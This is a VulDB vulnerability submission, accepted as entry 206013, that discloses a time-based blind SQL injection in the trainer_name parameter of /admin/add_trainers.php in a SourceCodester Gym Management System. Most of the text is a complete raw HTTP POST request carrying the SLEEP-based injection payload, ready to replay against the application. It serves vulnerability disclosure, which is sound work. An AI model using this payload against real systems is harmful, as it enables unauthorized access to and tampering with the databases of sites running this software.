| Titel | Gym Management System Background management Add New Trainer sql injection |
|---|
| Beschreibung | info:Gym management system background management Add New Trainer SQL injection
First write information on the page, capture packets, and modify the content to malicious code, which can achieve sql injection.
payload:
POST /admin/add_trainers.php HTTP/1.1
Host: 192.168.153.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29939306471339270980922343650
Content-Length: 560
Origin: http://192.168.153.1:8090
Connection: close
Referer: http://192.168.153.1:8090/admin/add_trainers.php
Cookie: PHPSESSID=jnf3qoj22hdbq8dh1k2k1och1i
Upgrade-Insecure-Requests: 1
-----------------------------29939306471339270980922343650
Content-Disposition: form-data; name="trainer_name"
1' AND (SELECT 2338 FROM (SELECT(SLEEP(5)))AoiQ) AND 'mHIu'='mHIu
-----------------------------29939306471339270980922343650
Content-Disposition: form-data; name="trainer_class"
Select a Class
-----------------------------29939306471339270980922343650
Content-Disposition: form-data; name="trainer_contact"
2
-----------------------------29939306471339270980922343650
Content-Disposition: form-data; name="add_trainer"
Add Trainer
-----------------------------29939306471339270980922343650--
|
|---|
| Quelle | ⚠️ https:// www.sourcecodester.com/php/15515/gym-management-system-project-php.html |
|---|
| Benutzer | jsbae3449 (UID 30775) |
|---|
| Einreichung | 10.08.2022 05:56 (vor 4 Jahren) |
|---|
| Moderieren | 10.08.2022 07:24 (1 hour later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 206013 [SourceCodester Gym Management System Add New Trainer /admin/add_trainers.php trainer_name SQL Injection] |
|---|
| Punkte | 20 |
|---|